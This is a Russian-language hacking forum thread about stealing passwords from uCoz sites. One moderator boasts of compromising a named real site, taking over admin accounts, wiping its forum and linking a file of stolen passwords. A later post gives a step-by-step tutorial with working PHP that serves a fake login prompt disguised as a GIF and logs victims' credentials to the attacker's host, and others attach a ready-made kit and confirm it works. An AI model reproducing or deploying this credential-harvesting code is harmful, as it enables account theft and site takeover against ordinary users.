Воскресенье, 22.12.2024, 19:29 Приветствую вас Гость | Группа "Гости" 
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
Модератор форума: Marra_Kesh, xXxSh@dowxXx  
ВЗЛОМ сайта на юкозе
C@TДата: Воскресенье, 13.06.2010, 12:49 | Сообщение # 1
Авторитетный
Зарегистрирован: 06.03.2010
Группа: Модераторы
Сообщений: 265
Статус: Offline
ну сперва я прошу поздравить меня с моим первым взломом biggrin

сайт- http://www.world-stalker.info/
----------------------------------------
какой ущерб был нанесен:

были удалены все сообщения на форуме
были перебанены все админы
и был удален весь дизайн
----------------------------------------
как ето было реализовано:

сперва я зарегистрировал домен на бесплатном хостинге с поддержкой PHP, дальше я написал простенький скриптик который при запуске рисует смайлик и запускает диологовое окно которое просит ввести логин и пароль и сохраняет то что ввели в файл на сайте дальше я переименовую етот скрипт в CoolSmile.php (можно было и гиф но я не знал что надо было сделать чтобы он заработал biggrin ) дальше я зашел на сайтик и в мини чате вписал бб код типа [имг]http://everything.h1.ru/coolsmile.php[/имг] и у них появился смайлик и после авторизации на сайте у них выскакивало окно с просьбой ввести логин и пароль в итоге у меня появилась база их паролей ну и несколько паролей админов smile
после етого я зашел под одним из админов и посмотрел имейлы всех админов (админов было всего два но было 5 аккаунтов с правами админов)потом я решил попробывать пароли от аккаунтов к их имейлов (начал создателя сайта) и я очень удивился когда пароль подошол после чего порылся по его мылу и нашол пароль от админ панели (админ когдато забыл пароль и ему он пришол на мыло biggrin ) на следующий день я и мой друг произвели атаку на сайт в итоге сайт пролежал 3 для с надписью Мы подверглись взлому и идут исправительные работы сегодня он вроде восстановлен но работает так себе так как форум почистили

P.S если вы знаете админа этого сайта просьба не говорить ему кто его взломал так как он думает что его взломала какая то девка
Файл с паролями здесь http://everything.h1.ru/passwords.txt (пароли админов не пашут так как они их поменяли) и все пароли там это пароли от юкозовских аккаунтов они собраны с сайта жертвы и с тех сайтов что были у него в друзьях biggrin


 
opiusДата: Воскресенье, 13.06.2010, 14:42 | Сообщение # 2
Частый гость
Зарегистрирован: 18.03.2010
Группа: Пользователи
Сообщений: 46
Статус: Offline
274 УК РФ не боишься ? wink а так молодец




Сообщение отредактировал opius - Воскресенье, 13.06.2010, 14:43
 
C@TДата: Воскресенье, 13.06.2010, 15:43 | Сообщение # 3
Авторитетный
Зарегистрирован: 06.03.2010
Группа: Модераторы
Сообщений: 265
Статус: Offline
Quote (C@T)
274 УК РФ не боишься

а чо тут боятся я действовал через прокси (TOR рулит smile )


 
Marra_KeshДата: Понедельник, 14.06.2010, 10:58 | Сообщение # 4
Постоянный
Зарегистрирован: 19.12.2009
Группа: Модераторы
Сообщений: 182
Статус: Offline
C@T, поздравляю тебя, а данный способ подходит для любого сайта?

Заведующий палатой #6
 
C@TДата: Понедельник, 14.06.2010, 18:00 | Сообщение # 5
Авторитетный
Зарегистрирован: 06.03.2010
Группа: Модераторы
Сообщений: 265
Статус: Offline
да можно сказать для любого главное чтобы были разрешены бб коды [имг][/имг] и чтобы были тупые юзеры которые отдадут свой пароль biggrin

 
C@TДата: Понедельник, 14.06.2010, 18:09 | Сообщение # 6
Авторитетный
Зарегистрирован: 06.03.2010
Группа: Модераторы
Сообщений: 265
Статус: Offline
кстати если кому интересно то производится набор в команду "Unknown Avengers Team"

кому интересно то стучите в аську 603702296


 
XDXDXDДата: Четверг, 09.02.2012, 21:09 | Сообщение # 7
Новичок
Зарегистрирован: 16.10.2010
Группа: Пользователи
Сообщений: 4
Статус: Offline
Привет. Сегодня я расскажу один из способов взлома сайтов на юкозе. Настоящий хакер может найти достаточно много уязвимостей на таких сайтах и знает много способов их взлома. Я надеюсь что скоро тоже буду таким=).

Итак, начнем...
Для начала нажно зарегистировать хост с поддержкой php (например http://mysite.phphost.net) . После регистрации льем на фтп скрипт и ставим права на пустой .txt файл, например : passwords.txt (сюда будут присылаться пассы пользователей похаканного сайта), и на файл smile.gif. Также скачайте любой смайлик в расширении .gif (типа cool.gif).
Затем откройте блокнот, да простой блокнот и напишите следующее:

code:
header("Content-type: image/gif");
$image = imagecreatefromgif('cool.gif');
if(!$_COOKIE['LOGON'])
{
$login = $_SERVER['PHP_AUTH_USER'];
$pass = $_SERVER['PHP_AUTH_PW'];
if(strlen($pass) <= 4 || !$login)
{
Header('HTTP/1.1 401 Unauthorized');
Header('WWW-Authenticate: Basic realm="Ucoz Control panel"');
}
elseif($login)
{
setcookie('LOGON',md5($pass));
$f = fopen('passwords.txt', 'ab');
fwrite($f, $login." ||| ".$pass."\r\n");
fclose($f);
}
}
imagegif($image);
imagedestroy($image);
?>

Как только вы напишите всё - сохраните файл под названием smile, потом поменяйте расширение на gif.
Теперь выбирайте любой юкозовский сайт, например http://target.ucoz.ru/ слева юкозовских сайтов как обычно, у большинства есть мини-чат справа. Так вот - для начала зарегистируйтесь на сайте, потом в мини чате напишите логин, а в содержании сообщения напишите следующее:

code:
[img]http:mysite.phphost.net/smile.gif[img]

И нажмите ОК. Если после этого в миничате вместо сообщения появился смайлик - значит радуйтесь, т.к. сайт - уязвимый. После этого у всех кто будет заходить на данную страницу, (в этом примере это http://target.ucoz.ru/) будет появлятся форма в которую нужно будет ввести логин и пароль. У вас при входе на сайт такая форма будет появлятся тоже. И все, введеные логины и пароли в эту форму будут отсылатся в пустой файл passwords.txt, который вы создали в самом начале и залили на фтп.

Удачи! Практикуйтесь. Только на некоторых сайтах эта уязвимость может и не пройти. Но стандрартно созданный юкозовский сайт без доп. своих настроек будет уязвим. Всем спасибо за просмотр, надеюсь статья вам поможет =)))

Тема с сайта http://l1f3.ru/load/40-1-0-129


XP
 
link993Дата: Четверг, 09.02.2012, 21:32 | Сообщение # 8
Участник
Зарегистрирован: 13.02.2011
Группа: Пользователи
Сообщений: 93
Статус: Offline
Скажите, а этот способ только для сайтов юкоз? Можно ли где нибудь на форуме такой смайл встроить?
 
Волк-1024Дата: Четверг, 09.02.2012, 21:43 | Сообщение # 9
Авторитетный
Зарегистрирован: 24.07.2011
Группа: Модераторы
Сообщений: 469
Статус: Offline
link993, Да. Кста этот метод оооочень старый...

Pascal, C\C++, Assembler, Python
 
link993Дата: Четверг, 09.02.2012, 21:46 | Сообщение # 10
Участник
Зарегистрирован: 13.02.2011
Группа: Пользователи
Сообщений: 93
Статус: Offline
Волк, можешь поподробнее объяснить, а то я кроме делфи не шарю не в чем. Как это происходить будет?
 
link993Дата: Четверг, 09.02.2012, 21:46 | Сообщение # 11
Участник
Зарегистрирован: 13.02.2011
Группа: Пользователи
Сообщений: 93
Статус: Offline
Можно это как нить в подпись у форума встроить?
 
Волк-1024Дата: Четверг, 09.02.2012, 22:01 | Сообщение # 12
Авторитетный
Зарегистрирован: 24.07.2011
Группа: Модераторы
Сообщений: 469
Статус: Offline
link993, Да. Я только что на примере этого форума провел эту фишку. Если видел. Конечно. Я уже это убрал.

Pascal, C\C++, Assembler, Python

Сообщение отредактировал Волк-1024 - Четверг, 09.02.2012, 22:22
 
Волк-1024Дата: Четверг, 09.02.2012, 22:15 | Сообщение # 13
Авторитетный
Зарегистрирован: 24.07.2011
Группа: Модераторы
Сообщений: 469
Статус: Offline
Вот.
Прикрепления: 1811873.jpg (697.5 Kb)


Pascal, C\C++, Assembler, Python
 
Волк-1024Дата: Четверг, 09.02.2012, 22:20 | Сообщение # 14
Авторитетный
Зарегистрирован: 24.07.2011
Группа: Модераторы
Сообщений: 469
Статус: Offline
Вот, что требуется для взлома. (Выдрал прямо со своего хоста)

P.S. Удалите кто-нить лишние посты.
Прикрепления: erx7v6PI.rar (10.6 Kb)


Pascal, C\C++, Assembler, Python

Сообщение отредактировал Волк-1024 - Четверг, 09.02.2012, 22:23
 
dolphinДата: Четверг, 09.02.2012, 23:25 | Сообщение # 15
Администратор
Сообщений: 906
Статус: Offline
biggrin Вот поэтому у нас и нет миничата!

Система: Windows 10 x64, Kali Linux
Среды программирования: Delphi 7, Delphi 10.x

Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
 
Волк-1024Дата: Четверг, 09.02.2012, 23:50 | Сообщение # 16
Авторитетный
Зарегистрирован: 24.07.2011
Группа: Модераторы
Сообщений: 469
Статус: Offline
dolphin, Такое можно куда угодно впихнуть. На форум, в подпись, миничат и т.д и т.п. Но я не думаю, что найдётся много дураков, которые поведутся на форму с требованием пароля. Хотя... Дураков много biggrin

Pascal, C\C++, Assembler, Python
 
dolphinДата: Пятница, 10.02.2012, 00:10 | Сообщение # 17
Администратор
Сообщений: 906
Статус: Offline
Да понятно что на форум можно, но миничат на главной всегда и на более видном месте

Система: Windows 10 x64, Kali Linux
Среды программирования: Delphi 7, Delphi 10.x

Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
 
GReIIIHuKДата: Пятница, 10.02.2012, 11:54 | Сообщение # 18
Участник
Зарегистрирован: 15.05.2011
Группа: Пользователи
Сообщений: 98
Статус: Offline
Насколько я знаю, ucoz система уже заблокировала данный способ. Теперь на сайте изначально(даже на сайтах типа: клан cs) нету BB кодов.

Skype:"greiiihuk."


Да, я преступник. Мое преступление — любопытство.
Быть может умру я, умрут многие, но идея останется жить навсегда.
Я работаю не только за спасибо.(+) ©
 
Волк-1024Дата: Пятница, 10.02.2012, 14:02 | Сообщение # 19
Авторитетный
Зарегистрирован: 24.07.2011
Группа: Модераторы
Сообщений: 469
Статус: Offline
GReIIIHuK,
Quote
Насколько я знаю, ucoz система уже заблокировала данный способ.
К сожалению или счастью этот способ нигде и ни когда не закрывали (например, этот форум). Я выше выложил скрин как такое провернуть на сдешнем форуме... biggrin


Pascal, C\C++, Assembler, Python
 
GReIIIHuKДата: Суббота, 11.02.2012, 12:24 | Сообщение # 20
Участник
Зарегистрирован: 15.05.2011
Группа: Пользователи
Сообщений: 98
Статус: Offline
Скажу честно, удивлен. Я пытался года 2-3 назад попробовать сделать что то подобное, но в мини-чате сразу же блокировало. Попробовать на форуме не подумал даже.

Skype:"greiiihuk."


Да, я преступник. Мое преступление — любопытство.
Быть может умру я, умрут многие, но идея останется жить навсегда.
Я работаю не только за спасибо.(+) ©
 
xXxSh@dowxXxДата: Понедельник, 13.02.2012, 00:16 | Сообщение # 21
Авторитетный
Зарегистрирован: 22.01.2012
Группа: Модераторы
Сообщений: 702
Статус: Offline
если я не ошибаюсь это все простой пример Активной XSS уязвимости с вызовом фейкового окна авторизации...

Сообщение отредактировал xXxSh@dowxXx - Понедельник, 13.02.2012, 00:59
 
Волк-1024Дата: Понедельник, 13.02.2012, 15:18 | Сообщение # 22
Авторитетный
Зарегистрирован: 24.07.2011
Группа: Модераторы
Сообщений: 469
Статус: Offline
xXxSh@dowxXx, Оно самое.

Pascal, C\C++, Assembler, Python
 
GReIIIHuKДата: Среда, 15.02.2012, 12:32 | Сообщение # 23
Участник
Зарегистрирован: 15.05.2011
Группа: Пользователи
Сообщений: 98
Статус: Offline
Редко такое встретишь.Да и зачем нужен сайт такого муда*а, который такое допустит?)

Skype:"greiiihuk."


Да, я преступник. Мое преступление — любопытство.
Быть может умру я, умрут многие, но идея останется жить навсегда.
Я работаю не только за спасибо.(+) ©
 
  • Страница 1 из 1
  • 1
Поиск:

delphicode.ru © 2008 - 2024 Хостинг от uCoz